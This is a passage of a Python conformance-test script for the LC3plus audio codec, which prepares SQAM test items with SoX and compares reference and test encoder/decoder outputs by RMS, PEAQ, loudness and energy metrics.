Try running \"pip3 install numpy\".')\n\n# convenience\nExecutor = concurrent.futures.ThreadPoolExecutor\nTestEnv = collections.namedtuple('TestEnv', 'profile test config test_dir, workers')\nWavInfo = collections.namedtuple('WavInfo', 'ch rate frames')\n\n# constants\nSAMPLERATES = [8000, 16000, 24000, 32000, 44100, 48000]\nFRAME_SIZES = [2.5, 5.0, 10.0]\nSQAM_URL = 'https://tech.ebu.ch/docs/testmaterial/SQAM_FLAC.zip'\nSQAM_SHA256 = '7d6fcd0fc42354637291792534b61bf129612f221f8efef97b62e8942a8686aa'\nSOX_URL = 'https://sourceforge.net/projects/sox/files/sox/14.4.2/sox-14.4.2-win32.zip'\nSOX_SHA256 = '8072cc147cf1a3b3713b8b97d6844bb9389e211ab9e1101e432193fad6ae6662'\nSOX_EXE = pathlib.Path('SoX/sox-14.4.2/sox.exe')\nINF = float('inf')\nREFERENCE_ENCODER = './LC3plus.exe -q -E -formatG192 -frame_ms {frame_size} {options} \"{input}\" \"{output}\" {bitrate}'\nREFERENCE_DECODER = './LC3plus.exe -q -D -formatG192 {options} \"{input}\" \"{output}\"'\n\n# test items\nITEM_DIR = pathlib.Path('test_items')\nITEMS = { # start, frag, SQAM name\n 'ABBA' : ( 7, 8, '69.flac'),\n 'Castanets' : ( 0, 8, '27.flac'),\n 'Eddie_Rabbitt' : ( 0, 8, '70.flac'),\n 'Female_Speech_German': ( 0, 8, '53.flac'),\n 'Glockenspiel' : ( 0, 10, '35.flac'),\n 'Piano_Schubert' : ( 0, 8, '60.flac'),\n 'Violoncello' : ( 0, 10, '10.flac'),\n 'Harpsichord' : (39, 9, '40.flac'),\n 'Male_Speech_English' : ( 0, 8, '50.flac'),\n}\nITEMS_PLC = ['ABBA', 'Castanets', 'Female_Speech_German', 'Harpsichord' , 'Male_Speech_English']\nITEM_LOW_PASS = 'White_Noise_LP20'\nITEM_BAND_LIMIT = 'Female_Speech_German'\n\n# sampling rate, band widths, bytes / frame\nBAND_LIMITS = {\n 48000: ([4000, 8000, 12000, 16000], 115),\n 32000: ([4000, 8000, 12000], 80),\n 24000: ([4000, 8000], 60),\n 16000: ([4000], 40),\n}\nBAND_WIDTHS = {\n 48000: [4000, 8000, 12000, 16000, 20000],\n 32000: [4000, 8000, 12000, 16000],\n 24000: [4000, 8000, 12000],\n 16000: [4000, 8000],\n}\n\n# config default values\nTESTS = [\n 'sqam',\n 'band_limiting',\n 'low_pass',\n 'bitrate_switching',\n 'bandwidth_switching',\n 'plc',\n 'pc',\n 'ep_correctable',\n 'ep_non_correctable',\n 'ep_mode_switching',\n 'ep_combined',\n 'ep_combined_nc',\n]\nTEST_MODES = ['encode', 'encdec', 'decode']\nDEFAULTS_GLOBAL = {\n 'option_bandwidth' : '',\n 'option_ep_debug' : '',\n 'option_ep_mode' : '',\n 'option_plc_mode' : '',\n 'peaq_bin' : '',\n 'peaq_odg_regex' : '',\n 'reference_decoder': REFERENCE_DECODER,\n 'reference_encoder': REFERENCE_ENCODER,\n}\nDEFAULTS_TEST = {'configs': []}\nfor test in TESTS:\n DEFAULTS_TEST['test_' + test] = False\nfor test, mode in itertools.product(TESTS, TEST_MODES):\n DEFAULTS_TEST['{}_{}_eng_threshold'.format(test, mode)] = 70\n DEFAULTS_TEST['{}_{}_mld_threshold'.format(test, mode)] = 4\n DEFAULTS_TEST['{}_{}_odg_threshold'.format(test, mode)] = 0.06\n DEFAULTS_TEST['{}_{}_rms_threshold'.format(test, mode)] = 14\n DEFAULTS_TEST['{}_{}_metric'.format(test, mode)] = 'rms'\nMETRIC_DEFAULTS = {\n 'low_pass_encode_metric' : 'eng',\n 'low_pass_encdec_metric' : 'eng',\n 'plc_decode_metric' : 'mld',\n 'pc_decode_metric' : 'mld',\n 'ep_non_correctable_decode_metric': 'mld',\n 'ep_non_correctable_encdec_metric': 'mld',\n 'ep_combined_nc_decode_metric' : 'mld',\n 'ep_combined_nc_encdec_metric' : 'mld',\n}\nDEFAULTS_TEST.update(METRIC_DEFAULTS)\n\n# html output stuff\nLABEL = {\n 'sqam' : 'SQAM',\n 'band_limiting' : 'Band Limitation',\n 'low_pass' : 'Low Pass',\n 'bitrate_switching' : 'Bitrate Switching',\n 'bandwidth_switching': 'Bandwidth Switching',\n 'plc' : 'Packet 
Loss Concealment',\n    'pc'                  : 'Partial Concealment',\n    'ep_correctable'      : 'Channel Coder for Correctable Frames',\n    'ep_non_correctable'  : 'Channel Coder for Non-Correctable Frames',\n    'ep_mode_switching'   : 'Error protection mode switching',\n    'ep_combined'         : 'Combined Channel Coder for Correctable Frames',\n    'ep_combined_nc'      : 'Combined Channel Coder for Non-Correctable Frames',\n}\nHEADER_ALL = ['Mode', 'Item', 'Frame Size', 'Samplerate', 'Bitrate']\nHEADER_EP = ['EP Mode']\nHEADER_EPD = ['BFI', 'EPMR', 'ER']\nHEADER_BL = ['Bandwidth']\nHEADER_METRIC = {\n    'rms': ['Max. Abs. Diff', 'RMS [dB]', 'RMS Reached [bits]'],\n    'odg': ['ODGref', 'ΔODG'],\n    'mld': ['MLD'],\n    'eng': ['Ediff [dB]'],\n    None : []\n}\nHTML_HEAD = ('<!DOCTYPE html><html><head><meta charset=\"utf-8\"><title>{title} Report</title>'\n             '<style>{style}</style></head><body>\\n'\n             '<h2>Conformance for \"{title}\" {state}!</h2>\\n')\nHTML_DIV = '<div><h3>{label} - {percent}%</h3>\\n<table>\\n'\nSTYLE = ('body {font-family:sans-serif; color:#f8f8f2; background-color:#272822; font-size:80%} div {border:1px solid '\n         '#8f908a; border-radius:4px; overflow:hidden; display:table; margin-left:30px; margin-bottom:30px} h2 {text-a'\n         'lign:left; margin-left:30px} h3 {text-align:left; margin:4px} table {border-spacing:0px; width:100%} th {pad'\n         'ding:4px; border-top:1px solid #8f908a} td {padding:4px} tr:nth-child(even) {background-color:rgba(255,255,2'\n         '55,0.1)} td.pass {background-color:rgba(0,192,255,0.4)} td.fail {background-color:rgba(255,0,0,0.4)} td.warn'\n         '{background-color:rgba(214,137,16,0.4)}')\n\n\n# convenience wrapper for os.makedirs\ndef makedirs(path):\n    os.makedirs(str(path), exist_ok=True)\n    return path\n\n\n# convenience wrapper for shutil.rmtree\ndef removedir(path):\n    shutil.rmtree(str(path), ignore_errors=True)\n\n\n# Run command and return output. cmd can be string or list. Commands with .exe suffix are automatically\n# called with wine unless wine=False. Set unicode=False to get binary output. Set hard_fail=False\n# to ignore nonzero return codes.\ndef call(cmd, wine=True, unicode=True, hard_fail=True, log_output=True):\n    if isinstance(cmd, str):\n        cmd = [x for x in shlex.split(cmd) if x]\n    if sys.platform != 'cygwin' and wine and cmd[0].lower().endswith('.exe'):\n        cmd = ['wine'] + cmd\n    p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=unicode)\n    out = p.communicate()[0] or (b'', '')[unicode]\n    quoted_cmd = ' '.join(map(shlex.quote, cmd))\n    logging.debug(quoted_cmd)\n    if unicode and log_output:\n        logging.debug(out)\n    if hard_fail and p.returncode != 0:\n        raise OSError(quoted_cmd + ' failed!')\n    return out\n\n\n# return url as a bytes object, validate against hash\ndef download(url, sha256=None):\n    try:\n        buf = call('curl --silent -L \"{}\"'.format(url), unicode=False)\n    except OSError:\n        sys.exit('Failed to download {}!'.format(url))\n    if sha256 and hashlib.sha256(buf).hexdigest() != sha256:\n        sys.exit('Failed to validate hash for {}!'.format(url))\n    return buf\n\n\ndef download_sox():\n    if not is_file(SOX_EXE):\n        print('Downloading SoX ...')\n        buf = download(SOX_URL, SOX_SHA256)\n        zipfile.ZipFile(io.BytesIO(buf)).extractall(str(SOX_EXE.parent.parent))\n        if sys.platform == 'cygwin':\n            call('chmod -R +x \"{}\"'.format(SOX_EXE.parent))\n\n\ndef exe_exists(exe, wine=False):\n    try:\n        out = call(exe, wine=wine, hard_fail=False)\n    except OSError:\n        return False\n    return not (wine and out.startswith('wine: '))  # detect wine: cannot find\n\n\ndef check_system(args, globvars):\n    if sys.platform == 'win32':\n        sys.exit('This script must run under cygwin')\n    tools = ['curl', 'gcc', 'make']\n    if sys.platform != 'cygwin':\n        tools += ['wine']\n    if args.system_sox:\n        tools += ['sox']\n    for tool in tools:\n        if not exe_exists(tool):\n            sys.exit('Failed to find {} executable'.format(tool))\n    if globvars['peaq_bin'] and not exe_exists(globvars['peaq_bin'], wine=True):\n        sys.exit('Failed to find PEAQ executable. Please adjust config file')\n    if not exe_exists(globvars['encoder'], wine=True):\n        sys.exit('Failed to find LC3 encoder executable. Please adjust config file.')\n    if not exe_exists(globvars['decoder'], wine=True):\n        sys.exit('Failed to find LC3 decoder executable. 
Please adjust config file.')\n\n\n# search s for expr and return first match or exit\ndef regex_search(expr, s):\n m = re.search(expr, s)\n if not m:\n sys.exit('No match for regular expression \"{}\"!'.format(expr))\n return m.group(1)\n\n\n# calculates the max xcorr of the two vectors within the length of the longer one\ndef align_vec(x1, x2):\n # trims longer vector at position of max xcorr and returns both\n assert len(x1) >= len(x2)\n res = []\n d = len(x1) - len(x2)\n # normalize to max of int16\n a = numpy.float32(x1) / 32767\n b = numpy.float32(x2) / 32767\n # a is longer than b\n for i in range(d + 1):\n xx = numpy.dot(a[i:len(b) + i], b)\n res.append(xx)\n lag = numpy.array(res).argmax()\n # trim longer vector\n x1 = x1[lag:lag + len(x2)]\n return x1, x2
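\n\n# Editor's illustration (not part of the original tool): a tiny worked example\n# of align_vec. With x1 = [0, 0, 9000, 3000] and x2 = [9000, 3000], the dot\n# products for lags 0..2 are 0, 27e6 and 90e6 (ignoring the 1/32767\n# normalization), so the max-xcorr lag is 2 and x1 is trimmed accordingly:\n#   align_vec(numpy.array([0, 0, 9000, 3000]), numpy.array([9000, 3000]))\n#   -> (array([9000, 3000]), array([9000, 3000]))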
\n\n# convert byte objects to signed int16\ndef byte_to_float(b, frames, channels):\n return struct.unpack(\"%ih\" % (frames * channels), b)\n\n\n# trim longer file to length of shorter file at max xcorr position and overwrite longer one\ndef align_files(file_1, file_2):\n logging.debug('align_files: %s %s', file_1, file_2)\n file_1, file_2 = str(file_1), str(file_2)\n # read in audio files as int16 samples\n if wav_info(file_1).frames < wav_info(file_2).frames:\n file_1, file_2 = file_2, file_1\n with wave.open(file_1, 'rb') as wf1, wave.open(file_2, 'rb') as wf2:\n b1 = wf1.readframes(wf1.getnframes())\n b2 = wf2.readframes(wf2.getnframes())\n x1 = byte_to_float(b1, wf1.getnframes(), wf1.getnchannels())\n x2 = byte_to_float(b2, wf2.getnframes(), wf2.getnchannels())\n par1 = wf1.getparams()\n par2 = wf2.getparams()\n # measure cross correlation -> delay between files and return trimmed vectors\n y1, y2 = align_vec(x1, x2)\n # overwrite files\n with wave.open(file_1, 'wb') as wf1, wave.open(file_2, 'wb') as wf2:\n wf1.setparams(par1)\n wf2.setparams(par2)\n wf1.setnframes(len(y1))\n wf2.setnframes(len(y2))\n b1 = struct.pack(\"%ih\" % len(y1), *y1)\n b2 = struct.pack(\"%ih\" % len(y2), *y2)\n wf1.writeframes(b1)\n wf2.writeframes(b2)\n\n\ndef build_tools():\n call('make -C tools')\n\n\n# return info about wav file\ndef wav_info(path):\n wav = wave.open(str(path))\n return WavInfo(wav.getnchannels(), wav.getframerate(), wav.getnframes())\n\n\n# call sox with args in repeatable mode, lazy skips execution if output already exists\ndef sox(*args, lazy=False):\n wavs = [x for x in map(str, args) if x.endswith('.wav')]\n if not (lazy and is_file(wavs[-1])): # last .wav is assumed to be output\n call('{} -R {}'.format(SOX_EXE, ' '.join(map(str, args))))\n\n\ndef trim(input, output, start, end, lazy=False):\n if not (lazy and is_file(output)):\n tmp = output.parent / uuid_file('trim_', '.wav')\n sox(input, tmp, 'trim', start, end)\n wi = wav_info(tmp)\n sox(tmp, output, 'fade', 0.5, wi.frames / wi.rate, 0.7)\n tmp.unlink()\n\n\n# resample wav using sox\ndef resample(input, output, rate, lazy=False):\n sox(input, output, 'rate -vs', rate, lazy=lazy)\n\n\n# apply lowpass filter using sox\ndef low_pass(input, output, fc, lazy=False):\n sox(input, output, 'sinc -{}'.format(fc), lazy=lazy)\n\n\n# generate switching file with unique name, returns path\ndef generate_switching_file(env, *values):\n path = env.test_dir / uuid_file('swf_', '.dat')\n layers = ','.join(map(str, sorted(values)))\n cmd = 'tools/gen-rate-profile.exe -layers {} {}'\n call(cmd.format(layers, path), log_output=False)\n return path\n\n\n# compares binary equality of files\ndef compare_bin(file1, file2):\n logging.debug('compare_bin: %s %s', file1, file2)\n return filecmp.cmp(str(file1), str(file2))\n\n\n# copy file from src to dst\ndef copy_file(src, dst):\n logging.debug('copy_file: %s %s', src, dst)\n shutil.copy(str(src), str(dst))\n\n\n# generate unique file name with extension\ndef uuid_file(prefix='', suffix=''):\n return prefix + str(uuid.uuid4()) + suffix\n\n\n# like str() but with special case for float\ndef fstr(x):\n return '{:.3g}'.format(x) if type(x) == float else str(x)\n\n\n# like str() but with special case for list\ndef lstr(x):\n return '-'.join(map(str, x)) if type(x) in (list, tuple) else str(x)\n\n\n# returns true if path is a file\ndef is_file(path):\n return os.path.isfile(str(path))\n\n\n# calculate bitrate from bytes per frame\ndef get_bitrate(bytes_per_frame, frame_size):\n return int(bytes_per_frame * 8000 / frame_size)\n\n\n# apply func to list of arguments, one call per tuple\ndef thread_executor(func, args, workers):\n list(ThreadPoolExecutor(workers).map(lambda x: func(*x), args)) # list() to collect futures\n\n\ndef prepare_items(workers):\n sqam_dir = pathlib.Path('SQAM')\n item_dir = makedirs(ITEM_DIR)\n if not sqam_dir.exists():\n print('Downloading test items ...')\n buf = download(SQAM_URL, SQAM_SHA256)\n zipfile.ZipFile(io.BytesIO(buf)).extractall(str(sqam_dir))\n\n print('Preparing test items ...')\n # trim items\n with Executor(workers) as ex:\n for item, (st, fr, flac) in ITEMS.items():\n infile = sqam_dir / flac\n outfile = item_dir / (item + '.wav')\n ex.submit(trim, infile, outfile, st, fr, lazy=True)\n # resample items\n with Executor(workers) as ex:\n for item, sr in itertools.product(ITEMS, SAMPLERATES):\n infile = item_dir / (item + '.wav')\n outfile = item_dir / '{}_{}_2ch.wav'.format(item, sr)\n ex.submit(resample, infile, outfile, sr, lazy=True)\n with Executor(workers) as ex:\n # 20 kHz lowpass\n for item, sr in itertools.product(ITEMS, SAMPLERATES):\n if sr >= 44100:\n infile = item_dir / '{}_{}_2ch.wav'.format(item, sr)\n outfile = item_dir / '{}_{}_2ch_lp20.wav'.format(item, sr)\n ex.submit(low_pass, infile, outfile, 20000, lazy=True)\n # band limit\n for sr, (bws, _) in BAND_LIMITS.items():\n for bw in bws:\n infile = item_dir / '{}_{}_2ch.wav'.format(ITEM_BAND_LIMIT, sr)\n outfile = item_dir / '{}_{}_2ch_bw{}.wav'.format(ITEM_BAND_LIMIT, sr, bw)\n ex.submit(low_pass, infile, outfile, bw, lazy=True)\n # LP20 item with 4 seconds of white noise above 20kHz\n outfile = item_dir / (ITEM_LOW_PASS + '_48000_1ch.wav')\n synth = 'synth 4 white fir etc/hp_fir_coef.txt'\n ex.submit(sox, '-n -r 48000 -c 1 -b 16', outfile, synth, lazy=True)\n # create 1ch items\n with Executor(workers) as ex:\n for path in os.listdir(str(item_dir)):\n if '_2ch' in path:\n infile = item_dir / path\n outfile = item_dir / path.replace('_2ch', '_1ch')\n ex.submit(sox, infile, outfile, 'remix -', lazy=True)\n\n
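# Editor's note: an illustrative config in the shape parse_config below expects.\n# Section names, tool paths and the 10 ms frame size are assumptions; only the\n# line syntax (mode, frame size, samplerate, bitrate or start:step:stop range)\n# is taken from the parsing code:\n#   [globals]\n#   enabled_tests = my_profile\n#   encoder = LC3plus.exe -E -q {input} {output} {bitrate}\n#   decoder = LC3plus.exe -D -q {input} {output}\n#   [my_profile]\n#   configs = encdec, 10, 48000, 64000:16000:128000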
\ndef parse_config(path):\n def strip_comment(line):\n return line.split('#', 1)[0].strip()\n\n def split_list(line):\n return [x.strip() for x in strip_comment(line).split(',')]\n\n def parse_conf_line(line):\n mode, fs, sr, br = split_list(line)\n fs, sr = float(fs), int(sr)\n if ':' in br:\n br_start, br_step, br_stop = map(int, br.split(':'))\n br = list(range(br_start, br_stop + 1, br_step))\n else:\n br = [int(br)]\n if fs not in FRAME_SIZES:\n sys.exit('Unsupported frame size: {}!'.format(line))\n if sr not in SAMPLERATES:\n sys.exit('Unsupported sampling rate: {}!'.format(line))\n if min(br) < 16000 or max(br) > 320000:\n sys.exit('Invalid bitrate: {}!'.format(line))\n return mode, fs, sr, br\n\n def parse_bool(val):\n if val not in ('0', '1'):\n raise ValueError\n return val == '1'\n\n if not is_file(path):\n sys.exit('No such file: ' + path)\n\n globals_required = ['enabled_tests', 'encoder', 'decoder']\n globals_all = list(DEFAULTS_GLOBAL) + globals_required\n test_keys = ['test_' + t for t in TESTS]\n globels = DEFAULTS_GLOBAL.copy()\n configs = {}\n\n try:\n parser = configparser.ConfigParser()\n parser.read(path)\n # parse global section\n for key in parser['globals']:\n globels[key] = strip_comment(parser['globals'][key])\n if key not in globals_all:\n sys.exit('Unknown key \"{}\" in config'.format(key))\n globels['enabled_tests'] = split_list(parser['globals']['enabled_tests'])\n # trigger KeyError for required keys\n for key in globals_required:\n globels[key]\n # parse test sections\n for profile in globels['enabled_tests']:\n configs[profile] = {**globels, **DEFAULTS_TEST}\n for key in parser[profile]:\n try:\n val = strip_comment(parser[profile][key])\n if key in test_keys:\n configs[profile][key] = parse_bool(val)\n elif key == 'configs':\n lines = parser[profile][key].splitlines()\n configs[profile][key] = [parse_conf_line(l) for l in lines]\n elif key.endswith('_threshold') and key in DEFAULTS_TEST:\n configs[profile][key] = float(val)\n elif key.endswith('_metric') and key in DEFAULTS_TEST:\n if val not in ('rms', 'odg', 'mld', 'eng'):\n raise ValueError\n configs[profile][key] = val\n else:\n sys.exit('Unknown key \"{}\" in config'.format(key))\n except ValueError:\n sys.exit('Invalid value in config: {} = {}'.format(key, parser[profile][key]))\n except KeyError as e:\n sys.exit('Missing \"{}\" in config'.format(e.args[0]))\n except configparser.DuplicateOptionError as e:\n sys.exit('Duplicate key \"{}\" in config'.format(e.args[1]))\n\n return globels, configs\n\n\n# splits up files into channels, yields channel files\ndef split_channels(env, *files):\n channels = wav_info(files[0]).ch\n if channels == 1:\n yield files\n else:\n for ch in range(1, channels + 1):\n tmp_files = []\n for f in files:\n tmp = env.test_dir / uuid_file('split_', '.wav')\n sox(f, tmp, 'remix', ch)\n tmp_files.append(tmp)\n yield tmp_files\n\n\ndef run_rms(env, file1, file2, threshold):\n rms, diff, bits = -INF, 0, 24\n for split1, split2 in split_channels(env, file1, file2):\n tmp1 = env.test_dir / uuid_file('rms_', '.wav')\n tmp2 = env.test_dir / uuid_file('rms_', '.wav')\n copy_file(split1, tmp1)\n copy_file(split2, tmp2)\n align_files(tmp1, tmp2)\n out = call('tools/rms {} {} {}'.format(tmp1, tmp2, threshold))\n diff_samp = int(regex_search(r'different samples\\s+: (\\d+)', out))\n if diff_samp != 0:\n rms = max(rms, float(regex_search(r'Overall RMS value\\s+: (\\S+) dB ---', out)))\n diff = max(diff, float(regex_search(r'Maximum difference\\s+: (\\S+) ---', out)))\n bits = min(bits, int(regex_search(r'RMS criteria\\s+: (\\d+) bit', out)))\n return rms, diff, bits\n\n\ndef run_peaq(env, reference, test):\n odg = 5\n for split1, split2 in split_channels(env, reference, test):\n ref = env.test_dir / uuid_file('odg_', '.wav')\n tst = env.test_dir / uuid_file('odg_', '.wav')\n resample(split1, ref, 48000)\n resample(split2, tst, 48000)\n align_files(ref, tst)\n out = call(env.config['peaq_bin'].format(reference=ref, test=tst))\n odg = min(odg, float(regex_search(env.config['peaq_odg_regex'], out)))\n return odg
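\n\n# Editor's aside: ODG is PEAQ's \"objective difference grade\", roughly 0 for\n# imperceptible degradation down to -4 for very annoying. run_peaq above grades\n# reference and test outputs against the same input, and compare_wav below\n# passes the test when the grades are close, e.g. (hypothetical numbers):\n#   odg_ref, odg_tst = -0.31, -0.35\n#   abs(odg_ref - odg_tst) <= 0.06   # True -> passes a 0.06 ODG threshold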
\n\ndef run_mld(env, reference, test):\n mld = 0\n for split1, split2 in split_channels(env, reference, test):\n ref = env.test_dir / uuid_file('mld_', '.wav')\n tst = env.test_dir / uuid_file('mld_', '.wav')\n resample(split1, ref, 48000)\n resample(split2, tst, 48000)\n align_files(ref, tst)\n out = call('tools/mld -d {} {}'.format(ref, tst))\n mld = max(mld, float(regex_search(r'maximum loudness difference:\\s*(\\S+)', out)))\n return mld\n\n\n# calculate energy difference of two wavs\ndef energy_diff(env, file1, file2):\n logging.debug('energy_diff: %s %s', file1, file2)\n tmp1 = str(env.test_dir / uuid_file('eng_', '.wav'))\n tmp2 = str(env.test_dir / uuid_file('eng_', '.wav'))\n copy_file(file1, tmp1)\n copy_file(file2, tmp2)\n align_files(tmp1, tmp2)\n with wave.open(tmp1, 'rb') as ref_wf, wave.open(tmp2, 'rb') as tst_wf:\n bytes_ref = ref_wf.readframes(ref_wf.getnframes())\n bytes_tst = tst_wf.readframes(tst_wf.getnframes())\n ref = byte_to_float(bytes_ref, ref_wf.getnframes(), ref_wf.getnchannels())\n tst = byte_to_float(bytes_tst, tst_wf.getnframes(), tst_wf.getnchannels())\n eng_diff = sum(numpy.square(numpy.subtract(ref, tst)))\n eng_diff = math.log10(eng_diff) if eng_diff != 0 else -INF\n return eng_diff\n\n\n# compare output wavs by metric rms, odg, mld, eng\ndef compare_wav(env, mode, infile, file_ref, file_tst):\n mkey = '{}_{}_metric'.format(env.test, mode)\n metric = env.config[mkey]\n tkey = '{}_{}_{}_threshold'.format(env.test, mode, metric)\n thresh = env.config[tkey]\n\n if metric == 'rms':\n rms, diff, bits = run_rms(env, file_ref, file_tst, thresh)\n rms_thr = 20 * math.log10(2 ** (-thresh + 1) / 12 ** 0.5)\n diff_thr = 1 / 2 ** (thresh - 3)\n ok_rms = rms <= rms_thr\n ok_diff = diff <= diff_thr\n ok_bits = bits >= thresh\n ok = ok_rms and ok_diff\n values = [(diff, ('fail', 'pass')[ok_diff], diff_thr),\n (rms, ('fail', 'pass')[ok_rms], rms_thr),\n (bits, ('warn', 'none')[ok_bits], thresh)]\n if metric == 'odg':\n odg_ref = run_peaq(env, infile, file_ref)\n odg_tst = run_peaq(env, infile, file_tst)\n odg_diff = abs(odg_ref - odg_tst)\n ok = odg_diff <= thresh\n values = [(odg_ref, '', None),\n (odg_diff, ('fail', 'pass')[ok], thresh)]\n if metric == 'mld':\n mld = run_mld(env, file_ref, file_tst)\n ok = mld <= thresh\n values = [(mld, ('fail', 'pass')[ok], thresh)]\n if metric == 'eng':\n d_eng = energy_diff(env, file_ref, file_tst)\n ok = d_eng <= thresh\n values = [(d_eng, ('fail', 'pass')[ok], thresh)]\n\n return ok, values
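\n\n# Editor's illustration of the rms thresholds above: for a 14-bit criterion,\n# rms_thr = 20*log10(2**-13 / 12**0.5) is about -89.1 dB and diff_thr is\n# 1/2**11, about 4.9e-4 of full scale, i.e. the test output has to match the\n# reference to roughly 14 significant bits per sample.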
\n\n# compare output files of ep debug flag\ndef compare_errors(env, file_ref, file_tst):\n ok_all, values = True, []\n for ext in ['.bfi', '.epmr', '.error_report']:\n ok = compare_bin(str(file_ref) + ext, str(file_tst) + ext)\n ok_all = ok_all and ok\n values += [(('bad', 'ok')[ok], ('fail', 'pass')[ok], None)]\n return ok_all, values\n\n\n# ensure the input exists and the output is not overwritten\ndef check_io_files(input, output):\n if not is_file(input):\n raise FileNotFoundError(input)\n if is_file(output):\n raise FileExistsError(output)\n\n\ndef encode_reference(env, input, output, frame_size, bitrate, bandwidth=None, ep_mode=0):\n check_io_files(input, output)\n cmd = env.config['reference_encoder']\n opt = []\n if bandwidth:\n opt += ['-bandwidth', bandwidth]\n if ep_mode:\n opt += ['-epmode', ep_mode]\n options = ' '.join(map(str, opt))\n call(cmd.format(input=input, output=output, frame_size=frame_size, bitrate=bitrate, options=options))\n\n\ndef encode_test(env, input, output, frame_size, bitrate, bandwidth=None, ep_mode=0):\n check_io_files(input, output)\n cmd = env.config['encoder']\n opt = []\n if bandwidth:\n opt += [env.config['option_bandwidth'].format(arg=bandwidth)]\n if ep_mode:\n opt += [env.config['option_ep_mode'].format(arg=ep_mode)]\n options = ' '.join(opt)\n call(cmd.format(input=input, output=output, frame_size=frame_size, bitrate=bitrate, options=options))\n\n\ndef decode_reference(env, input, output, error_file=None):\n check_io_files(input, output)\n cmd = env.config['reference_decoder']\n opt = []\n if error_file:\n opt += ['-ep_dbg', error_file]\n options = ' '.join(map(str, opt))\n call(cmd.format(input=input, output=output, options=options))\n\n\ndef decode_test(env, input, output, error_file=None):\n check_io_files(input, output)\n cmd = env.config['decoder']\n opt = []\n if error_file:\n opt += [env.config['option_ep_debug'].format(arg=error_file)]\n options = ' '.join(map(str, opt))\n call(cmd.format(input=input, output=output, options=options))\n\n\ndef apply_error_pattern(env, input, output, mode, pattern):\n assert mode in ('fer', 'ber', 'flip')\n check_io_files(input, output)\n if mode == 'fer':\n cmd = 'tools/eid-xor.exe -vbr -bs g192 -ep byte -fer {} {} {}'\n call(cmd.format(input, pattern, output))\n if mode == 'ber':\n cmd = 'tools/eid-xor.exe -vbr -bs g192 -ep byte -ber {} {} {}'\n call(cmd.format(input, pattern, output))\n if mode == 'flip':\n cmd = 'tools/flipG192 {} {} {} {} 1911 0'\n flips, frames = pattern\n call(cmd.format(input, output, flips, frames))\n # copy the config file of g192 bitstreams\n if is_file(str(input) + '.cfg'):\n copy_file(str(input) + '.cfg', str(output) + '.cfg')\n\n\n# create file names for test\ndef make_files(env, files, *args):\n prototype = '_'.join(map(lstr, args)) + '_'\n return tuple(env.test_dir / (prototype + f) for f in files)\n\n\n# permute test configs\ndef sqam_configs(config, items, ch=1, lp20=True, modes=None):\n for mode, fs, sr, brs in config['configs']:\n if modes and mode not in modes:\n continue\n for item, br in itertools.product(items, brs):\n suffix = '_lp20' if lp20 and sr in (44100, 48000) else ''\n infile = ITEM_DIR / '{}_{}_{}ch{}.wav'.format(item, sr, ch, suffix)\n yield mode, item, fs, sr, br, infile\n\n\n# apply test func to list of tests, multithreaded\ndef test_executor(env, func, tests):\n ex = Executor(env.workers)\n return list(ex.map(lambda args: func(*args), tests))\n\n\n# process a single test item\n# performs encoding, error insertion, decoding and evaluation\n# returns tuple of bool, list (pass condition, metric values)\n# mode: encode/decode/encdec, fs: frame size, sr: sampling rate, br: bitrate\ndef process_item(env, mode, item, fs, sr, br, infile, bandwidth=None, ep_mode=0, error_mode=None, error_pattern=None):\n bw_name = 'swf' if is_file(bandwidth) else bandwidth\n ep_name = '1-4' if is_file(ep_mode) else ep_mode\n fmt = ' {} {:20} {:3g} ms {:5} Hz {:>6} bit/s ep:{}'\n print(fmt.format(mode, item, fs, sr, lstr(br), ep_name))\n\n file_names = ['r.g192', 't.g192', 're.g192', 'te.g192', 'r.wav', 't.wav', 'rd', 'td']\n file_tuple = make_files(env, file_names, mode, infile.stem, fs, sr, br, bw_name, ep_name)\n ref_bin, tst_bin, ref_err, tst_err, ref_wav, tst_wav, ref_dbg, tst_dbg = file_tuple\n # evaluate channel coder output only for decode_ep_* tests\n if not (env.test.startswith('ep_') and mode == 'decode'):\n err_ok, err_val, ref_dbg, tst_dbg = True, [], None, None\n\n try:\n # generate bitrate switching file if needed\n if type(br) in (list, tuple):\n br = generate_switching_file(env, *br)\n # encode\n encode_reference(env, infile, ref_bin, fs, br, bandwidth=bandwidth, ep_mode=ep_mode)\n if mode in ('encode', 'encdec'):\n encode_test(env, infile, tst_bin, fs, br, 
bandwidth=bandwidth, ep_mode=ep_mode)\n # apply errors\n if error_mode:\n apply_error_pattern(env, ref_bin, ref_err, error_mode, error_pattern)\n ref_bin = ref_err\n if mode in ('encode', 'encdec'):\n apply_error_pattern(env, tst_bin, tst_err, error_mode, error_pattern)\n tst_bin = tst_err\n # decode\n decode_reference(env, ref_bin, ref_wav, error_file=ref_dbg)\n if mode == 'encode':\n decode_reference(env, tst_bin, tst_wav, error_file=tst_dbg)\n if mode == 'encdec':\n decode_test(env, tst_bin, tst_wav, error_file=tst_dbg)\n if mode == 'decode':\n decode_test(env, ref_bin, tst_wav, error_file=tst_dbg)\n # compare outputs\n ok, val = compare_wav(env, mode, infile, ref_wav, tst_wav)\n if ref_dbg and tst_dbg:\n err_ok, err_val = compare_errors(env, ref_dbg, tst_dbg)\n return ok and err_ok, err_val + val\n\n except (OSError, FileNotFoundError, FileExistsError, KeyError) as e:\n logging.error('process_item: %s: %s', type(e).__name__, str(e))\n return False, []\n\n\ndef test_sqam(env):\n print('Testing SQAM ...')\n def func(mode, item, fs, sr, br, infile):\n ok, values = process_item(env, mode, item, fs, sr, br, infile)\n return [ok, mode, item, fs, sr, br] + values\n\n tests = sqam_configs(env.config, ITEMS)\n return test_executor(env, func, tests)\n\n\ndef test_band_limiting(env):\n print('Testing band limitation ...')\n def func(mode, item, fs, sr, br, bw):\n infile = ITEM_DIR / '{}_{}_1ch_bw{}.wav'.format(item, sr, bw)\n ok, values = process_item(env, mode, item, fs, sr, br, infile)\n return [ok, mode, item, fs, sr, br, bw] + values\n\n tests = set()\n for mode, fs, sr, _ in env.config['configs']:\n if sr >= 16000:\n bw_limits, frame_bytes = BAND_LIMITS[sr]\n br = get_bitrate(frame_bytes, fs)\n for bw in bw_limits:\n tests.add((mode, ITEM_BAND_LIMIT, fs, sr, br, bw))\n return test_executor(env, func, list(tests))\n\n\ndef test_low_pass(env):\n print('Testing low pass ...')\n def func(mode, item, fs, sr, br, infile):\n ok, values = process_item(env, mode, item, fs, sr, br, infile)\n return [ok, mode, item, fs, sr, br] + values\n\n items = [ITEM_LOW_PASS]\n modes = ['encode', 'encdec']\n tests = []\n for 